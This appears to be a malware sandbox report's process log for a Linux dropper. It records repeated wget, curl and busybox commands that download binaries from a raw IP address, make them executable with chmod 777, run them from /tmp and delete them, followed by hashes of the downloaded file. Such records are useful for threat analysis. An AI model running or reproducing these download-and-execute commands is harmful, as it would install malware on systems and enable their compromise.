/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1654
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:1657
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1658
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1660
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:1662
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:1663
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1666
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:1671
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1672
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Writes file to tmp directory
PID:1673
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1674
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:1676
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:1677
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1678
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Writes file to tmp directory
PID:1679
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1680
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:1681
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:1682
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:1683
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1684
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Writes file to tmp directory
PID:1685
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1686
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:1687
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:1688
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:1689
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97